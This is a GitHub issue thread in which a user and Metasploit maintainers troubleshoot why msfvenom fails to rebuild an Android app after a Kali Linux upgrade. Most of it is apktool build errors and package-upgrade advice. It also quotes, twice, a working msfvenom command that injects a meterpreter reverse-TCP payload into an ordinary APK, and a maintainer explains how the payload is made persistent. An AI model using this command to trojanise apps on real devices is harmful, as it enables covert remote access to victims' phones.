Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

msfvenom apktool fails following upgrade to Kali Linux 2018.4 #11024

Closed
ssnkhan opened this issue Nov 25, 2018 · 24 comments

Comments

@ssnkhan
Copy link

commented Nov 25, 2018

Steps to reproduce

Since upgrading to a fresh and clean install of Kali Linux 2018.4, msfvenom is unable to generate weaponised APKs. An identical command worked prior to the update.

How'd you do it?

  1. apt-get install zipalign
  2. apt-get install lib32stdc++6 lib32ncurses6 lib32z1++
  3. msfvenom -x /root/Downloads/Diary.apk -p android/meterpreter/reverse_tcp LHOST=192.168.224.129 LPORT=4444 -f raw -o /root/Desktop/Diary.apk

apktool version:

Apktool v2.3.4 - a tool for reengineering Android apk files
with smali v2.2.2 and baksmali v2.2.2

Expected behavior

What should happen?
msfvenom should decompile, inject payload, and recompile the APK. An APK should be generated.

Current behavior

What happens instead?

<snip>
I: Building resources...
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:97: error: Public symbol array/activities declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:98: error: Public symbol array/font_family declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:99: error: Public symbol array/font_family_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:100: error: Public symbol array/font_size declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:101: error: Public symbol array/font_size_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:102: error: Public symbol array/jazzy_effects declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:103: error: Public symbol array/line_spacing declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:104: error: Public symbol array/line_spacing_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:105: error: Public symbol array/temp_unit declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:106: error: Public symbol array/temp_unit_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:107: error: Public symbol array/theme_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:108: error: Public symbol array/time_format declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:109: error: Public symbol array/time_format_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:110: error: Public symbol array/timeout declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:111: error: Public symbol array/timeout_values declared here is not defined.
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_13823034621095822413.tmp, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 28, --version-code, 341, --version-name, 2.7.1, --no-version-vectors, -F, /tmp/APKTOOL1448141242914440406.tmp, -0, arsc, -0, META-INF/android.support.design_material.version, -0, META-INF/androidx.appcompat_appcompat.version, -0, META-INF/androidx.arch.core_core-runtime.version, -0, META-INF/androidx.asynclayoutinflater_asynclayoutinflater.version, -0, META-INF/androidx.browser_browser.version, -0, META-INF/androidx.cardview_cardview.version, -0, META-INF/androidx.coordinatorlayout_coordinatorlayout.version, -0, META-INF/androidx.core_core.version, -0, META-INF/androidx.cursoradapter_cursoradapter.version, -0, META-INF/androidx.customview_customview.version, -0, META-INF/androidx.documentfile_documentfile.version, -0, META-INF/androidx.drawerlayout_drawerlayout.version, -0, META-INF/androidx.fragment_fragment.version, -0, META-INF/androidx.interpolator_interpolator.version, -0, META-INF/androidx.legacy_legacy-support-core-ui.version, -0, META-INF/androidx.legacy_legacy-support-core-utils.version, -0, META-INF/androidx.legacy_legacy-support-v4.version, -0, META-INF/androidx.lifecycle_lifecycle-livedata-core.version, -0, META-INF/androidx.lifecycle_lifecycle-livedata.version, -0, META-INF/androidx.lifecycle_lifecycle-runtime.version, -0, META-INF/androidx.lifecycle_lifecycle-viewmodel.version, -0, META-INF/androidx.loader_loader.version, -0, META-INF/androidx.localbroadcastmanager_localbroadcastmanager.version, -0, META-INF/androidx.media_media.version, -0, META-INF/androidx.percentlayout_percentlayout.version, -0, META-INF/androidx.preference_preference.version, -0, META-INF/androidx.print_print.version, -0, META-INF/androidx.recyclerview_recyclerview.version, -0, META-INF/androidx.slidingpanelayout_slidingpanelayout.version, -0, META-INF/androidx.swiperefreshlayout_swiperefreshlayout.version, -0, META-INF/androidx.transition_transition.version, -0, META-INF/androidx.vectordrawable_vectordrawable-animated.version, -0, META-INF/androidx.vectordrawable_vectordrawable.version, -0, META-INF/androidx.versionedparcelable_versionedparcelable.version, -0, META-INF/androidx.viewpager_viewpager.version, -0, META-INF/com.google.android.material_material.version, -0, META-INF/services/com.github.scribejava.core.httpclient.HttpClientProvider, -0, META-INF/services/io.grpc.ManagedChannelProvider, -0, META-INF/services/io.grpc.NameResolverProvider, -0, png, -0, jpg, -0, res/drawable-hdpi-v4/colorstrip_shadow.9.png, -0, res/drawable-ldrtl-xxhdpi-v17/abc_spinner_mtrl_am_alpha.9.png, -0, res/drawable-xhdpi-v4/com_facebook_tooltip_black_background.9.png, -0, res/drawable-xhdpi-v4/com_facebook_tooltip_blue_background.9.png, -0, res/drawable-xhdpi-v4/notification_bg_low_normal.9.png, -0, res/drawable-xhdpi-v4/notification_bg_low_pressed.9.png, -0, res/drawable-xhdpi-v4/notification_bg_normal.9.png, -0, res/drawable-xhdpi-v4/notification_bg_normal_pressed.9.png, -0, res/drawable-xxhdpi-v4/abc_ab_share_pack_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_btn_switch_to_on_mtrl_00001.9.png, -0, res/drawable-xxhdpi-v4/abc_btn_switch_to_on_mtrl_00012.9.png, -0, res/drawable-xxhdpi-v4/abc_cab_background_top_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_list_divider_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_list_focused_holo.9.png, -0, res/drawable-xxhdpi-v4/abc_list_longpressed_holo.9.png, -0, res/drawable-xxhdpi-v4/abc_list_pressed_holo_dark.9.png, -0, res/drawable-xxhdpi-v4/abc_list_pressed_holo_light.9.png, -0, res/drawable-xxhdpi-v4/abc_list_selector_disabled_holo_dark.9.png, -0, res/drawable-xxhdpi-v4/abc_list_selector_disabled_holo_light.9.png, -0, res/drawable-xxhdpi-v4/abc_menu_hardkey_panel_mtrl_mult.9.png, -0, res/drawable-xxhdpi-v4/abc_popup_background_mtrl_mult.9.png, -0, res/drawable-xxhdpi-v4/abc_scrubber_primary_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_scrubber_track_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_spinner_mtrl_am_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_switch_track_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_tab_indicator_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_textfield_activated_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_textfield_default_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_textfield_search_activated_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_textfield_search_default_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/amu_bubble_mask.9.png, -0, res/drawable-xxhdpi-v4/amu_bubble_shadow.9.png, -0, res/drawable-xxhdpi-v4/common_google_signin_btn_icon_dark_normal_background.9.png, -0, res/drawable-xxhdpi-v4/common_google_signin_btn_icon_light_normal_background.9.png, -0, res/drawable-xxhdpi-v4/common_google_signin_btn_text_dark_normal_background.9.png, -0, res/drawable-xxhdpi-v4/common_google_signin_btn_text_light_normal_background.9.png, -0, gif, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20181125-19831-1akn8q0/original/res, -M, /tmp/d20181125-19831-1akn8q0/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool

System stuff

Metasploit version

Framework: 4.17.26-dev
Console : 4.17.26-dev

I installed Metasploit with:

  • Kali package via apt

OS

What OS are you running Metasploit on?
Kali Linux 2018.4 virtualised in VMWare, on OSX.

@ssnkhan

This comment has been minimized.

Copy link
Author

commented Nov 25, 2018

I should add I have ran apktool empty-framework-dir and also reviewed the following tickets:

iBotPeaches/Apktool#1780
iBotPeaches/Apktool#1725
iBotPeaches/Apktool#1579

@elogada

This comment has been minimized.

Copy link

commented Nov 25, 2018

Latest version of Apktool in the repo seems to be v2.3.4-dirty ...with smali v2.2.3-dev and baksmali v2.2.3-dev.

How's apt update; apt upgrade look like?

@ssnkhan

This comment has been minimized.

Copy link
Author

commented Nov 25, 2018

Thanks @elogada - running apt update; apt upgrade still shows:

Apktool v2.3.4 - a tool for reengineering Android apk files
with smali v2.2.2 and baksmali v2.2.2
@elogada

This comment has been minimized.

Copy link

commented Nov 25, 2018

Perhaps /etc/apt/sources.list isn't updated? The official Kali Linux repositories are listed in
https://docs.kali.org/general-use/kali-linux-sources-list-repositories

Try that first. But if you've updated that already, maybe the architecture is different for Mac and apktool has different packages for it. But I'm prolly wrong. Start with the sources.list first.

@elogada

This comment has been minimized.

Copy link

commented Nov 25, 2018

To check faster just smack your terminal with

apt update; apt install --only-upgrade apktool

edit: after updating your sources, of course.

@ssnkhan

This comment has been minimized.

Copy link
Author

commented Nov 25, 2018

Thanks for your continued help @elogaga. This is the content of my sources.list file:

# 
# deb cdrom:[Debian GNU/Linux 2018.4 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20181016-16:07]/ kali-last-snapshot contrib main non-free

#deb cdrom:[Debian GNU/Linux 2018.4 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20181016-16:07]/ kali-last-snapshot contrib main non-free

deb http://http.kali.org/kali kali-rolling main non-free contrib
# deb-src http://http.kali.org/kali kali-rolling main non-free contrib

# This system was installed using small removable media
# (e.g. netinst, live or single CD). The matching "deb cdrom"
# entries were disabled at the end of the installation process.
# For information about how to configure apt package sources,
# see the sources.list(5) manual.

I uncommented the deb-src and re-ran apt update; apt install --only-upgrade apktool which yielded:

it:1 https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch InRelease
Hit:2 http://ftp.hands.com/kali kali-rolling InRelease
Get:3 http://ftp.hands.com/kali kali-rolling/non-free Sources [131 kB]
Get:4 http://ftp.hands.com/kali kali-rolling/contrib Sources [62.3 kB]
Get:5 http://ftp.hands.com/kali kali-rolling/main Sources [12.4 MB]
Fetched 12.6 MB in 3s (3,918 kB/s)                      
Reading package lists... Done
Building dependency tree       
Reading state information... Done
13 packages can be upgraded. Run 'apt list --upgradable' to see them.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
apktool is already the newest version (2.3.4-1).
The following packages were automatically installed and are no longer required:
  libbind9-160 libdns1102 libirs160 libisc169 libisccc160 libisccfg160 liblwres160 libperl5.26 libpoppler74 libprotobuf-lite10 libprotobuf10 libqgis-analysis2.18.24
  libqgis-core2.18.24 libqgis-gui2.18.24 libqgis-networkanalysis2.18.24 libqgis-server2.18.24 libqgispython2.18.24 libradare2-2.9 libsane-extras libsane-extras-common
  libunbound2 openjdk-10-jdk openjdk-10-jdk-headless openjdk-10-jre python-anyjson python-backports.ssl-match-hostname python-couchdbkit python-http-parser python-jwt
  python-libemu python-restkit python-socketpool
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 13 not upgraded.

This is not fetching the latest version of apktool ...

@elogada

This comment has been minimized.

Copy link

commented Nov 25, 2018

Odd. Maybe you can try this. Check the dependencies of apktool using apt-cache depends apktool. Maybe those dependencies need upgrades or whatever.

I just read somewhere that apt isn't quite the same as apt-get (inb4 need more research). So

apt-get update; apt-get upgrade

would yield different results.

Also the latest smali is 2.2.5.

@ssnkhan

This comment has been minimized.

Copy link
Author

commented Nov 25, 2018

Output is:

apktool
  Depends: aapt
  Depends: android-framework-res
 |Depends: default-jre-headless
  Depends: <java7-runtime-headless>
    default-jre-headless
    openjdk-10-jre-headless
    openjdk-11-jre-headless
    openjdk-8-jre-headless
  Depends: libantlr3-runtime-java
  Depends: libcommons-cli-java
  Depends: libcommons-io-java
  Depends: libcommons-lang3-java
  Depends: libguava-java
  Depends: libsmali-java
  Depends: libstringtemplate-java
  Depends: libxmlunit-java
  Depends: libxpp3-java
  Depends: libyaml-snake-java

I had already done a apt-get update; apt-get upgrade previously -- personally, didn't know that apt get existed to be honest!

What is your output when you run apktool -v? This is literally a fresh install of 2018.4 - the only modifications I've done at to install zipalign and lib32stdc++6 lib32ncurses6 lib32z1++ as prerequisites. The only other tool installed in PowerShell Empire.

:(

@elogada

This comment has been minimized.

Copy link

commented Nov 25, 2018

Lol Linux noobs high-five! Anyway why not just install the whole metasploit-framework package without the --only-upgrade switch, maybe the packager should do everything for you.

apt-get install metasploit-framework

Here's my apktool -v:

Apktool v2.3.4-dirty - a tool for reengineering Android apk files
with smali v2.2.3-dev and baksmali v2.2.3-dev
Copyright 2014 Ryszard Wiśniewski <brut.alll@gmail.com>
Updated by Connor Tumbleson <connor.tumbleson@gmail.com>

And remove the --only-upgrade switch with apktool too for sureness' sake.

@ssnkhan

This comment has been minimized.

Copy link
Author

commented Nov 25, 2018

Haha, high five! Metasploit comes baked in with Kali, but in any case re-running apt-get doesn't do much:

Reading package lists... Done
Building dependency tree       
Reading state information... Done
metasploit-framework is already the newest version (4.17.26-0kali1).
metasploit-framework set to manually installed.
The following packages were automatically installed and are no longer required:
  libbind9-160 libdns1102 libirs160 libisc169 libisccc160 libisccfg160 liblwres160 libperl5.26 libpoppler74 libprotobuf-lite10 libprotobuf10 libqgis-analysis2.18.24
  libqgis-core2.18.24 libqgis-gui2.18.24 libqgis-networkanalysis2.18.24 libqgis-server2.18.24 libqgispython2.18.24 libradare2-2.9 libsane-extras libsane-extras-common
  libunbound2 openjdk-10-jdk openjdk-10-jdk-headless openjdk-10-jre python-anyjson python-backports.ssl-match-hostname python-couchdbkit python-http-parser python-jwt
  python-libemu python-restkit python-socketpool
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 13 not upgraded.
@elogada

This comment has been minimized.

Copy link

commented Nov 25, 2018

How's your apktool -v for you? If all else fails, I think this should be taken as a bug to be repaired in a future commit. Tagging @bcoles

@ssnkhan

This comment has been minimized.

Copy link
Author

commented Nov 25, 2018

@elogada I did another fresh install, and now the version correctly shows as:

Apktool v2.3.3-dirty - a tool for reengineering Android apk files
with smali v2.2.3-dev and baksmali v2.2.3-dev

Then tried again using a sample APK (https://www.apkmonk.com/download-app/com.pcvirt.ImageViewer/4_com.pcvirt.ImageViewer_2018-10-04.apk/ as an example)

Still getting errors, namely:

[-] I: Using Apktool 2.3.3-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/aapt/linux/aapt (defaulting to $PATH binary)
W: res/drawable-v21/$avd_hide_password__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-v21/$avd_hide_password__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-v21/$avd_hide_password__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-v21/$avd_show_password__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-v21/$avd_show_password__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-v21/$avd_show_password__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: A/        ( 2821): First type is not attr!
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 134): 
<snip>
Error: Unable to rebuild apk with apktool
@elogada

This comment has been minimized.

Copy link

commented Nov 26, 2018

Perhaps change the filename to suit the needs of the stack trace? I think it hates the $.

@bcoles

This comment has been minimized.

Copy link
Contributor

commented Nov 26, 2018

How's your apktool -v for you? If all else fails, I think this should be taken as a bug to be repaired in a future commit. Tagging @bcoles

Tagging @timwr

@ssnkhan

This comment has been minimized.

Copy link
Author

commented Nov 26, 2018

@elogada I note the error, however even APKs which successfully re-compiled previously are throwing up an error at the rebuilding stage.

Specifically to do with aapt: brut.common.BrutException: brut.common.BrutException:. One of the work-arounds referenced in the apktool threads is to set the -r switch which does not decode APK resources. However it is not possible to set this switch when calling via msfvenom. The following thread has a little more detail:

sensepost/objection#157

However, there is some commentary there that suggests whilst this allows the build to complete, the APK may not be viable (will not work properly).

@ssnkhan

This comment has been minimized.

Copy link
Author

commented Nov 26, 2018

Just noticed that the script at https://github.com/sensepost/kwetza/blob/master/kwetza.py already sets the -r switch, but unsure if this is the same script called by msfvenom (apologies for being a n00b):

command = ["apktool", "d","-f","-r", ""+cwd+"/"+sys.argv[1]]

@elogada

This comment has been minimized.

Copy link

commented Nov 26, 2018

Any chance you can do a pipe that goes something like msfvenom <params> | apktool <params>? I haven't tried myself, but maybe it's an option somehow? I say feature tag for this thread in this case.

However, is it possible that you can just make a meterpreter that works on arm (or maybe armhf) architectures, then recompile the apk file with the meterpreter included?

@ssnkhan

This comment has been minimized.

Copy link
Author

commented Nov 26, 2018

It is possible to inject meterpreter manually, but that would defeat the point of being able to do so in an automated manner which msfvenom supported prior to 2018.4 breaking it.

As I said, this exact command, msfvenom -x /root/Downloads/Diary.apk -p android/meterpreter/reverse_tcp LHOST=192.168.224.129 LPORT=4444 -f raw -o /root/Desktop/Diary.apk worked perfectly on Kali 2018.3 last week.

@elogada

This comment has been minimized.

Copy link

commented Nov 26, 2018

Well if this isn't a problem with msf this might be a bug in the Kali kernel. Here's docs on the bug tracker:

Submitting Bugs for Kali Linux
https://docs.kali.org/community/submitting-issues-kali-bug-tracker

You might be able to search for a similar ticket in case they already have a hotfix for 2018.4.

@timwr

This comment has been minimized.

Copy link
Contributor

commented Nov 27, 2018

The -r may help, but unfortunately decoding resource is needed to inject the permission, services and broadcast receive into the AndroidManifest.xml. Without this the meterpreter is not persistent. I guess we could add an AndroidIgnoreResources=true option to avoid it.
We could also add support for a native meterpreter with injection (we'd simply be calling the static Runtime.load function instead of the Payload.start function, and add meterpreter as a lib).

I'm still a bit confused about the actual bug though, I can't reproduce this with apktool 2.3.4. Previously apktool empty-framework-dir fixed this kind of error.

@ssnkhan

This comment has been minimized.

Copy link
Author

commented Nov 27, 2018

@elogada I registered to report the bug, but still have not received the registration email.

@timwr Looking at https://github.com/sensepost/kwetza/blob/master/kwetza.py, it appears that -r is already set. Is the msfvenom command I pasted working and generating a payload/APK on your install of 2018.4? I have tried apktool empty-framework-dir already, but doesn't appear to have resolved the issue.

@ssnkhan

This comment has been minimized.

Copy link
Author

commented Nov 28, 2018

@busterb

This comment has been minimized.

Copy link
Member

commented Nov 28, 2018

This seems like a bug in Kali's distribution of apktool, not really a bug in Metasploit. Feel free to continue discussion if you like, but I'm going to close it here since there's probably not much we can do in the metasploit-framework project to fix it for you. Feel free to reopen if that proves counter.

@busterb busterb closed this Nov 28, 2018

@ssnkhan ssnkhan referenced this issue Dec 1, 2018
@ssnkhan

This comment has been minimized.

Copy link
Author

commented Dec 1, 2018

Issue has been raised with Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=915225

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
5 participants
You can’t perform that action at this time.